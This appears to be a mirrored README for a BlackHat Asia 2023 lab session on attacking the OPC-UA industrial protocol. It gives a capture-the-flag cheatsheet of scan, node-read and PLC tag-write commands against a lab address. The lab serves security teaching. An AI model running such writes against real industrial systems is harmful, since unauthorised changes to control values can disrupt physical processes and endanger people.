Giter Site home page Giter Site logo

bhasia23-opcuhack's Introduction

BlackHat Arsenal Singapore 2023: OPC-U-HACK

Slides & content for our Arsenal lab session at BlackHat Asia 2023

This arsenal lab session aims at introducing the OPC-UA protocol, a modern protocol for Industrial Control Systems. A demo setup will be provided and our tool opcua-scan will be used.

Cheatsheet

Find below a few of commands that should help you flag!

RECON#01

Scan the machine: nmap -p- 192.168.0.20

Look for OPC-UA services: ./opcua_scan.py hello -i 192.168.0.20 -p '49320, 49321, 49664, 49665, 49666, 49667, 49670, 49679, 49681'

RECON#02 & RECON#03

Use of the IP because there is no working DNS ./opcua_scan.py server_config -t 'opc.tcp://192.168.0.20:49321'

RECON#04

List nodes that you can write to ./opcua_scan.py server_config -t 'opc.tcp://192.168.0.20:49320' -nw

List all the nodes ./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320'

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'i=85'

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150'

RECON#05

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320'

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'i=85'*

READ_DATA#01

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.XXX'

READ_DATA#02

./opcua_scan.py read_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.XXX'

WRITE_DATA#01

./opcua_scan.py write_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.part_1_up' -d True

WRITE_DATA#02

This one is a little bit more complex! Several steps are involved, one of which is exploiting dynamic tags

./opcua_scan.py write_data -t 'opc.tcp://192.168.0.20:49320' -r 'ns=2;s=ModbusPLC-10-3-0-150.Device2.XXXX' -a Username -u XXX -p XXX -d True

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.